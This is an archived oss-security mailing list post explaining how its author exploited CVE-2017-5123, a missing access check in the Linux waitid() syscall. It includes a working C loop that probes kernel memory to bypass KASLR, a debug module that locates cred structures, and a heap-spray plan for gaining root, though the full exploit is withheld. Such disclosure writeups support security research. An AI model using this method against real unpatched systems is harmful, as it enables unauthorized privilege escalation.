Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20171107023803.1312485e7yc7rvcw@webmail.alunos.dcc.fc.up.pt>
Date: Tue, 07 Nov 2017 02:38:03 +0100
From: up201407890@...nos.dcc.fc.up.pt
To: up201407890@...nos.dcc.fc.up.pt
Cc: oss-security@...ts.openwall.com
Subject: Re: Re: CVE-2017-5123 Linux kernel v4.13 waitid()
	not calling access_ok()

This will be a fast writeup on how I exploited CVE-2017-5123, a Linux  
kernel vulnerability in the waitid() syscall for 4.12-4.13, which  
gives an attacker a "write-not-what-only-where" primitive, or in other  
words, the ability to write "non-controlled" user data to arbitrary  
kernel memory.
KASLR is bypassed using memory probing and root obtained via cred  
struct spraying and location predictability.

The video demonstrating my exploit in action was published on November  
5th, as it can be seen here:

https://www.youtube.com/watch?v=DfwOJIcV5ZA


Surprisingly, Chris Salls independently published his own writeup and  
exploit on November 6th. Awesome work there!
https://salls.github.io/Linux-Kernel-CVE-2017-5123/

So now, November 7th (0:30 a.m here in Portugal!), I'll be detailing  
how I used this "write-not-what-only-where" vulnerability without a  
single read to get root.

Obviously, given other vulnerabilities, such as certain infoleaks, it  
would be an instant game over.

What spiked some interest to me, was what could one actually do with  
only this vulnerability by itself, or other vulnerabilities of this  
type, assuming all vanilla kernel protections.
It's powerful, but some would initially assume that it's not enough to  
increase our privileges these days.





The vulnerability:

from kernel/exit.c:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
                                   infop, int, options, struct rusage  
__user *, ru)
{
     struct rusage r;
     struct waitid_info info = {.status = 0};
     long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
     int signo = 0;

     if (err > 0) {
         signo = SIGCHLD;
         err = 0;
         if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
             return -EFAULT;
         }
         if (!infop)
             return err;

         user_access_begin();
         unsafe_put_user(signo, &infop->si_signo, Efault);
         unsafe_put_user(0, &infop->si_errno, Efault);
         unsafe_put_user(info.cause, &infop->si_code, Efault);
         unsafe_put_user(info.pid, &infop->si_pid, Efault);
         unsafe_put_user(info.uid, &infop->si_uid, Efault);
         unsafe_put_user(info.status, &infop->si_status, Efault);
         user_access_end();
         return err;
Efault:
         user_access_end();
         return -EFAULT;
}


The vulnerability here is that there's a missing access_ok() check in  
the waitid() syscall since they've introduced unsafe_put_user() in 4.12.
The macro access_ok() should basically ensure that the user specified  
ptr points to user space and not kernel space, since unprivileged  
users shouldn't be able to write arbitrarily to kernel memory.
This is done by checking the address limit.

from arch/x86/include/asm/uaccess.h

#define user_addr_max() (current->thread.addr_limit.seg)

...

/*
  * Test whether a block of memory is a valid user space address.
  * Returns 0 if the range is valid, nonzero otherwise.
  */
static inline bool __chk_range_not_ok(unsigned long addr, unsigned  
long size, unsigned long limit)
{
	/*
	 * If we have used "sizeof()" for the size,
	 * we know it won't overflow the limit (but
	 * it might overflow the 'addr', so it's
	 * important to subtract the size from the
	 * limit, not add it to the address).
	 */
	if (__builtin_constant_p(size))
		return unlikely(addr > limit - size);

	/* Arbitrary sizes? Be careful about overflow */
	addr += size;
	if (unlikely(addr < size))
		return true;
	return unlikely(addr > limit);
}

#define __range_not_ok(addr, size, limit)				\
({									\
	__chk_user_ptr(addr);						\
	__chk_range_not_ok((unsigned long __force)(addr), size, limit); \
})

...

#define access_ok(type, addr, size)					\
({									\
	WARN_ON_IN_IRQ();						\
	likely(!__range_not_ok(addr, size, user_addr_max()));		\
})



This means that this vulnerability allows an unprivileged user to  
specify a kernel address by using infop when calling waitid(), and the  
kernel will happily write to it.
What is actually written though is hardly controlled.
 From Chris' post: "info.status is a 32 bit int, but constrained to be  
0 < status < 256. info.pid can be somewhat controlled by repeatedly  
forking, but has a max value of 0x8000."

This, however, did not interest me. What interested me was that we  
could write 0's into arbitrary kernel memory.
Here's what differentiates my exploit from Chris' - If we could  
somehow find our cred's structure, we could write 0's there to  
effectively get root privileges by overwriting cred->euid and cred->uid.

from include/linux/cred.h:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are  
relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};


At this point we are completely blind though, we need a way to bypass  
KASLR and find the kernel heap.





KASLR bypass via memory probing:

By using functions such as copy_from_user/copy_to_user, etc., we make  
sure that a kernel OOPS won't happen when a bad address is specified  
via page fault exception handler.
This makes sense, since unprivileged users shouldn't be able to cause  
a DoS whenever they present an address that does not belong to the  
address space of the user space process.
The same happens by using unsafe_put_user(), which means that we can  
do some memory probing on the range of possible locations for the  
kernel heap!
I do this by using something along the lines of:

for(i = (char *)0xffff880000000000; ; i+=0x10000000) {
	pid = fork();
	if (pid > 0) {
		if(syscall(__NR_waitid, P_PID, pid, (siginfo_t *)i, WEXITED, NULL) >= 0) {
			printf("[+] Found %p\n", i);
			break;
		}
	}
	else if (pid == 0)
		exit(0);
}

The trick here is that waitid() won't return -EFAULT when we present  
it a valid address, so we can do some memory probing this way.
Thanks for the enlightenment spender, not the exploits (well actually  
those were pretty cool at the time) :)

Now that we know where the kernel heap lives, how do we know where our  
cred's structure live? The state of the kernel heap is pretty much  
unknown.





Heap Spraying:

At this point I already had a clear idea of what I wanted/needed.
If we create hundreds or thousands of processes, hundreds or thousands  
of cred structures will be created in the kernel heap.
So my idea was to create these many processes that will check in a  
loop if they get euid of 0, by constantly calling geteuid.
If geteuid returns 0, it means that we have hit the jackpot! From  
there, we can also write to cred->euid - 0x10, which is cred->uid.

By spraying the heap we higher the probability of hitting our target,  
but it is obviously not 100% reliable, just like Chris mentions in his  
heap spray.
Given the primitive we have, heap spraying obviously helps here :)

When spraying the heap with multiple struct cred's and observed their  
location, I noticed that some addresses are more likely than others to  
where the creds will reside.
This can be observed without the need for some kernel debugging if one  
wants to try it out easily, simply use this kernel module which prints  
where cred->euid lives.



#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/fs.h>		// for basic filesystem
#include <linux/proc_fs.h>	// for the proc filesystem
#include <linux/seq_file.h>	// for sequence files

static struct proc_dir_entry* jif_file;

static int
jif_show(struct seq_file *m, void *v)
{
	return 0;
}

static int
jif_open(struct inode *inode, struct file *file)
{
      printk("EUID: %p\n", &current->cred->euid);
      return single_open(file, jif_show, NULL);
}

static const struct file_operations jif_fops = {
     .owner	= THIS_MODULE,
     .open	= jif_open,
     .read	= seq_read,
     .llseek	= seq_lseek,
     .release	= single_release,
};

static int __init
jif_init(void)
{
     jif_file = proc_create("jif", 0, NULL, &jif_fops);

     if (!jif_file) {
         return -ENOMEM;
     }

     return 0;
}

static void __exit
jif_exit(void)
{
     remove_proc_entry("jif", NULL);
}

module_init(jif_init);
module_exit(jif_exit);

MODULE_LICENSE("GPL");


By forking() and opening /proc/jif repeatedly, we can later check the  
output of printk using dmesg.

# dmesg | grep EUID\:

[16485.192353] EUID: ffff88015e909a14
[16485.192415] EUID: ffff88015e9097d4
[16485.192475] EUID: ffff88015e909954
[16485.192537] EUID: ffff880126c627d4
[16485.192599] EUID: ffff88015e9094d4
[16485.192660] EUID: ffff88015e909414
[16485.192725] EUID: ffff88015e909294
[16485.192790] EUID: ffff88015e909054
[16485.192860] EUID: ffff8801358efdd4
[16485.192925] EUID: ffff8801358efd14
[16485.192991] EUID: ffff8801358efe94
[16485.193057] EUID: ffff88015e909354
[16485.193124] EUID: ffff88015e9091d4
[16485.193187] EUID: ffff8801358eff54
[16485.193249] EUID: ffff8801358efb94
[16485.193314] EUID: ffff8801358efa14
[16485.193381] EUID: ffff88015e909114
[16485.193449] EUID: ffff8801358ef894
[16485.193515] EUID: ffff8801358ef714
[16485.234054] EUID: ffff880125766d14
[16485.234150] EUID: ffff8801256e9954
[16485.234189] EUID: ffff8801256e9654
[16485.429875] EUID: ffff8801257661d4
[16485.429881] EUID: ffff8801256e9e94
[16485.603481] EUID: ffff8801358ef954
[16485.603543] EUID: ffff8801256e9b94
[16485.603582] EUID: ffff880126c62e94
[16485.603620] EUID: ffff8801358ef7d4
[16485.603658] EUID: ffff880126c62a14
[16485.603701] EUID: ffff880125766654
[16485.603743] EUID: ffff8801358ef654
[16485.603782] EUID: ffff8801257667d4
[16485.603824] EUID: ffff880125766a14
[16485.603864] EUID: ffff880125766b94
[16485.603906] EUID: ffff8801256e94d4
[16485.603943] EUID: ffff8801256e91d4
[16485.603979] EUID: ffff880126c62d14
[16485.604017] EUID: ffff88015e909654

[...]

We can kind of guess where they might be located, but obviously it's  
just guessing :)
So now we know that at heap base + some offset, the probability of  
hitting our target is kind of high compared to the rest.
And so I start writing to these and adding PAGESIZE in hope that we  
overwrite one of these processes' credentials.
If that happens, we win!





The exploit:

If you've read everything all the way down here, then I'm sure you can  
write your own... It's not that hard!
I've provided you with all the necessary information on how I  
exploited it. If I can, you can too. :)




Conclusion:

You've now seen that a vulnerability of this type, by itself, can  
still be dangerous when exploiting the Linux kernel.
Thanks again spender, André Baptista (@0xACB), and all xSTF.
Shout-out to .pt :)


Happy Hacking!

https://twitter.com/uid1000

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.